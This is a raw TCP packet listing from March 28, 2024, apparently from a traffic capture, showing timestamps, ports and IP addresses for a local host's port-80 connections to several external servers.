Mar 28, 2024 09:14:59.439085007 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.439138889 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.441855907 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.441873074 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.441931009 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.446944952 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.446960926 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.447057009 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.450700045 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.450714111 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.450778961 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.457196951 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.457724094 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.457787037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.457878113 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.462090015 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463280916 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463298082 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463310003 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463321924 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463332891 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463346004 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463349104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.463357925 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463372946 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463387012 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463398933 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463403940 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.463413000 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463437080 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.463437080 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.463450909 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.463483095 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.463511944 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.463866949 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.464260101 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.464273930 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.464348078 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.464371920 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.465365887 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.465382099 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.465393066 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.465404987 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.465415955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.465428114 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.465440989 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.465442896 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.465478897 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.465478897 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.465550900 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.465677977 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.466006041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.466063976 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.466514111 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.466528893 CET	80	49755	130.164.189.20	192.168.2.4
Mar 28, 2024 09:14:59.466583014 CET	80	49755	130.164.189.20	192.168.2.4
Mar 28, 2024 09:14:59.466583014 CET	49755	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:14:59.466603994 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.466626883 CET	49755	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:14:59.466645956 CET	49755	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:14:59.466783047 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.466837883 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.466892004 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.466923952 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.466972113 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.466985941 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467045069 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467077017 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467130899 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467142105 CET	49765	80	192.168.2.4	130.164.189.20
Mar 28, 2024 09:14:59.467161894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467206001 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467247009 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467283964 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467367887 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467433929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467477083 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467530012 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467597008 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467612028 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467664957 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467693090 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467711926 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467726946 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467766047 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467782974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.467855930 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.467855930 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.467901945 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.467916965 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.467956066 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.467983961 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468045950 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468069077 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468080044 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468105078 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468107939 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468122959 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468144894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468144894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468159914 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468230963 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468244076 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468255997 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468267918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468291998 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468291998 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468301058 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468327045 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468333006 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468341112 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468354940 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468368053 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468403101 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468413115 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468425035 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468466043 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468486071 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468497038 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468508005 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468539000 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468542099 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468565941 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468621969 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468628883 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468643904 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468657017 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468672991 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468692064 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468705893 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468718052 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468724012 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468743086 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468765974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468806982 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468816042 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468820095 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468858004 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468864918 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.468904972 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468905926 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.468964100 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469005108 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469018936 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469046116 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469077110 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469090939 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469118118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469130039 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469130039 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469130039 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469156027 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469182014 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469182014 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469252110 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469268084 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469329119 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469363928 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469373941 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469373941 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469379902 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469415903 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469424963 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469424963 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469439030 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469475031 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469499111 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469511986 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469511986 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469544888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469549894 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469558954 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469572067 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469594955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469603062 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469631910 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469631910 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469650030 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469664097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469676971 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469701052 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469715118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469734907 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469738007 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469769955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469777107 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469777107 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469794989 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469830990 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469852924 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469852924 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469857931 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469893932 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469894886 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469894886 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.469979048 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.469991922 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470004082 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470015049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470015049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470016956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470046997 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470046997 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470077991 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470122099 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470141888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470155954 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470191002 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470206976 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470206976 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470217943 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470244884 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470257044 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470257044 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470269918 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.470294952 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470295906 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.470310926 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.470321894 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.470340967 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.470351934 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.470386982 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.470489979 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470504045 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470535040 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.470539093 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470549107 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470551968 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470577955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470592022 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470592022 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470623016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470663071 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470678091 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470698118 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470698118 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470793962 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470837116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470850945 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470861912 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470882893 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470896006 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470922947 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470922947 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.470942974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.470980883 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.471015930 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.471015930 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.471771955 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.471791029 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.471806049 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.471828938 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.471851110 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.471862078 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.471875906 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.471925020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.471944094 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.471960068 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.471999884 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.472727060 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.472744942 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.472758055 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.472767115 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.472784042 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.472810030 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.472822905 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.472841024 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.472841024 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.472843885 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.472884893 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.472915888 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.473649979 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.473669052 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.473687887 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.473701000 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.473715067 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.473731041 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.473782063 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.473793983 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.473808050 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.473834991 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.473989964 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.474572897 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.474589109 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.474615097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.474627972 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.474641085 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.474642992 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.474673986 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.474684954 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.474699974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.474734068 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.474735022 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.474735022 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.474756956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.474787951 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.474795103 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.474811077 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.474823952 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.474838018 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.474841118 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.474858046 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.474889994 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.474890947 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.474905014 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.474917889 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.474945068 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.474962950 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.474977016 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475004911 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475014925 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475054979 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475059032 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475073099 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475101948 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475121975 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475131989 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475157976 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475173950 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475199938 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475203991 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475218058 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475230932 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475261927 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475265980 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475280046 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475296021 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475325108 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475342989 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475356102 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475368023 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475395918 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475418091 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475469112 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475512028 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475516081 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475529909 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475554943 CET	80	49737	185.172.128.6	192.168.2.4
Mar 28, 2024 09:14:59.475557089 CET	49737	80	192.168.2.4	185.172.128.6
Mar 28, 2024 09:14:59.475580931 CET	49737	80	192.168.2.4	185.172.128.6
